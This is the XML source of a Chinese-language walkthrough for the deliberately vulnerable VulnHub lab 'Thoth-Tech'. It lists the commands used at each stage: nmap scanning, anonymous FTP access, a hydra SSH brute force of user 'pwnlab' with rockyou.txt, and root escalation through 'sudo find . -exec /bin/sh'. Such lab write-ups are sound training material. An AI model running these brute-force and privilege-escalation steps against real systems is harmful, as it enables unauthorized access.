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CFDC" w14:textId="6307749F" w:rsidR="00266C0F" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:t>Thoth-Tech</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F17AF93" w14:textId="36A8F992" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载地址：</w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="00EC0D26">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>https://download.vulnhub.com/thothtech/Thoth-Tech.ova</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1EE0536D" w14:textId="77777777" w:rsidR="00585877" w:rsidRDefault="00585877"/>
    <w:p w14:paraId="4B6FDFEE" w14:textId="77777777" w:rsidR="00585877" w:rsidRDefault="00585877"/>
    <w:p w14:paraId="70B16948" w14:textId="5B4A47E6" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主机发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC71815" w14:textId="6E5E8E69" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:t>arp-scan -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9ABF4A" w14:textId="2D41911B" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4768731A" wp14:editId="50F2A3E0">
            <wp:extent cx="5274310" cy="1319530"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="310868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8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396F" w14:textId="74DCFF5A" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>目标：1</w:t>
      </w:r>
      <w:r>
        <w:t>92.168.21.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF0A0D" w14:textId="6667D43B" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>端口扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693342F7" w14:textId="56044507" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:t>nmap --min-rate 10000 -p- 192.168.21.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B43CB85" w14:textId="3D9EC026" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E3E52EA" wp14:editId="13B10E46">
            <wp:extent cx="5274310" cy="2096770"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1393938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38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B43C" w14:textId="7AB74A3D" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>服务扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82011F" w14:textId="72197131" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:t>nmap -sV -sT -O -p21,22,80 192.168.21.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F048CD" w14:textId="586E4F37" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1AE1D576" wp14:editId="0BBCD88B">
            <wp:extent cx="5274310" cy="2113280"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="682040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40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0CB0" w14:textId="4DE474F6" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞扫描</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39742765" w14:textId="13336E9B" w:rsidR="00585877" w:rsidRDefault="00585877">
      <w:r w:rsidRPr="00585877">
        <w:t>nmap --script=vuln -p21,22,80 192.168.21.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A706284" w14:textId="6C378801" w:rsidR="00585877" w:rsidRDefault="00954E9C">
      <w:r w:rsidRPr="00954E9C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="29697EE8" wp14:editId="37C6D670">
            <wp:extent cx="5274310" cy="2891155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="4445"/>
            <wp:docPr id="144913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31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D3D5" w14:textId="1AE32170" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>先去看web网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FE31D6E" w14:textId="5B90CC80" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r w:rsidRPr="00954E9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D0225C3" wp14:editId="4802F6D0">
            <wp:extent cx="5274310" cy="3975100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="481355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5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F191" w14:textId="7AB7A299" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在f</w:t>
      </w:r>
      <w:r>
        <w:t>12</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里面发现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14489D23" w14:textId="7487B6F1" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r w:rsidRPr="00954E9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="158223C7" wp14:editId="3CA3563F">
            <wp:extent cx="4023709" cy="693480"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="641891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1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5761" w14:textId="17BD290E" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再去看看web的别的</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048907FF" w14:textId="2FD37BD9" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r w:rsidRPr="00954E9C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F42FA1D" wp14:editId="278212E9">
            <wp:extent cx="3863675" cy="1524132"/>
            <wp:effectExtent l="0" t="0" r="3810" b="0"/>
            <wp:docPr id="834395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5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1B0A" w14:textId="6907A967" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r w:rsidRPr="00954E9C">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65FAB4C6" wp14:editId="5DF60065">
            <wp:extent cx="5265876" cy="4069433"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1505258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58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3E8D" w14:textId="32F2F3EA" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感觉少了点东西于是又扫了一遍</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4111FF2E" w14:textId="6E7B46E4" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r w:rsidRPr="00954E9C">
        <w:t>nmap -A 192.168.21.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A0A0EB" w14:textId="4950E803" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r w:rsidRPr="00954E9C">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FE1893E" wp14:editId="65276970">
            <wp:extent cx="5274310" cy="4530725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="541878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78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DB65" w14:textId="7819619B" w:rsidR="00954E9C" w:rsidRDefault="00954E9C">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>发现</w:t>
      </w:r>
      <w:r w:rsidR="00B25090">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp能匿名登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E912FA8" w14:textId="35290321" w:rsidR="00B25090" w:rsidRDefault="00B25090">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>去看看（用户名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="4D4D4D"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>anonymous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3703AEED" w14:textId="1D51DB9F" w:rsidR="00B25090" w:rsidRDefault="00B25090" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink w:history="1">
        <w:r w:rsidRPr="00EC0D26">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>ftp 192.168.21.148</w:t>
        </w:r>
        <w:r w:rsidRPr="00EC0D26">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:drawing>
            <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6497C712" wp14:editId="2DBCE577">
              <wp:extent cx="5274310" cy="2521585"/>
              <wp:effectExtent l="0" t="0" r="2540" b="0"/>
              <wp:docPr id="150581704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0581704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521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732650C" w14:textId="2178F951" w:rsidR="00B25090" w:rsidRDefault="00E203CB" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E203CB">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39015F15" wp14:editId="692495C0">
            <wp:extent cx="5274310" cy="1170940"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1873813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13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4958" w14:textId="3136B399" w:rsidR="00E203CB" w:rsidRDefault="00E203CB" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里告诉我们pwnlab能爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A77CEA1" w14:textId="13AF1901" w:rsidR="00E203CB" w:rsidRDefault="00E203CB" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00E203CB">
        <w:t>hydra -l pwnlab -P /usr/share/wordlists/rockyou.txt ssh://192.168.21.148</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C96B16" w14:textId="6FA98C9F" w:rsidR="00E203CB" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56849AFC" wp14:editId="0B35193D">
            <wp:extent cx="5274310" cy="1442720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="1554420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20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F06" w14:textId="63F70D4B" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ssh登入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238E8A6E" w14:textId="66F49E2C" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16DC8">
        <w:t xml:space="preserve">ssh </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="00EC0D26">
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>pwnlab@192.168.21.148</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="50241899" w14:textId="6798840F" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="610F26D6" wp14:editId="7E75CEF0">
            <wp:extent cx="5274310" cy="4864100"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="116763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34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6938" w14:textId="6F847C6C" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B969132" w14:textId="4830C340" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16DC8">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11BF476B" wp14:editId="0E37D828">
            <wp:extent cx="5274310" cy="1139190"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="1063086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6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0C9A" w14:textId="1F793E33" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息收集</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BCECE3" w14:textId="58ABC0B5" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="500CC0A0" wp14:editId="1446A5BA">
            <wp:extent cx="4861981" cy="2537680"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1618970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0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1CE5" w14:textId="3AA3175A" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr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和1</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是我执行的发现有find</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74540AE9" w14:textId="4756B7EC" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00F16DC8">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64DAB9FD" wp14:editId="68CC873D">
            <wp:extent cx="5274310" cy="201295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="146231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4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37E5" w14:textId="423FEEFF" w:rsidR="00F16DC8" w:rsidRDefault="00F16DC8" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里用find找可执行的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B527837" w14:textId="4D45D2A1" w:rsidR="00F16DC8" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0053726E">
        <w:t>find / -user root -perm /40000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A3638" w14:textId="21F087CA" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="0053726E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有东西</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A84867" w14:textId="5E92417B" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0053726E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2BE7067E" wp14:editId="4223CAD7">
            <wp:extent cx="5274310" cy="486410"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="935518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18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837A" w14:textId="7BBF7A50" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>再看看sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3663A6F7" w14:textId="01D66A07" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0053726E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19AE3A01" wp14:editId="687F2FBB">
            <wp:extent cx="5274310" cy="847725"/>
            <wp:effectExtent l="0" t="0" r="2540" b="9525"/>
            <wp:docPr id="2070460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00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807E" w14:textId="7E94FC30" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>find</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>没有密码要求，那么就需要利用这个来提权了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BCDA43" w14:textId="5E269DAB" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:anchor=":~:text=find%20%E5%91%BD%E4%BB%A4%E6%8F%90%E6%9D%83%201%201.%20%E6%9F%A5%E7%9C%8Bfind%E5%91%BD%E4%BB%A4%E6%9D%83%E9%99%90%20%E6%96%B9%E6%B3%95%20%E4%B8%80%E3%80%81%20%23,3.%20%E5%8F%8D%E5%BC%B9shell%20%E5%B8%B8%E8%A7%84%E5%A5%97%E8%B7%AF%20%EF%BC%8C2%E4%B8%AA%E6%9C%BA%E5%99%A8%E3%80%82%20%E4%B8%80%E4%B8%AA%E5%BC%80%E7%9B%91%E5%90%AC%EF%BC%8C%E4%B8%80%E4%B8%AA%E6%89%A7%E8%A1%8C%E5%8F%8D%E5%BC%B9%E5%91%BD%E4%BB%A4%203.1%20%E5%BC%80%E7%9B%91%E5%90%AC%20" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a3"/>
          </w:rPr>
          <w:t>find 命令提权 - 编程猎人 (programminghunter.com)</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FD3AF28" w14:textId="080159EA" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0053726E">
        <w:t>sudo find . -exec /bin/sh \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5E45F" w14:textId="6B8EB75B" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0053726E">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5D1D212F" wp14:editId="17406832">
            <wp:extent cx="5274310" cy="692150"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1883658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89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38A0" w14:textId="77286274" w:rsidR="0053726E" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="0053726E">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6355FE37" wp14:editId="6EC98281">
            <wp:extent cx="5274310" cy="1868170"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="354537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77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12F" w14:textId="1B76D859" w:rsidR="0053726E" w:rsidRPr="00585877" w:rsidRDefault="0053726E" w:rsidP="00B25090">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结束</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0053726E" w:rsidRPr="0058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DD"/>
    <w:rsid w:val="00266C0F"/>
    <w:rsid w:val="0053726E"/>
    <w:rsid w:val="00585877"/>
    <w:rsid w:val="00954E9C"/>
    <w:rsid w:val="00B25090"/>
    <w:rsid w:val="00D072DD"/>
    <w:rsid w:val="00E203CB"/>
    <w:rsid w:val="00F1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E04A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{6CCB9957-7357-4C60-98E5-C298C620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8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5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pwnlab@192.168.21.148" TargetMode="External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programminghunter.com/article/9510233201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download.vulnhub.com/thothtech/Thoth-Tech.ov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泽巍 吴</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>泽巍 吴</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-16T06:29:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-16T07:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>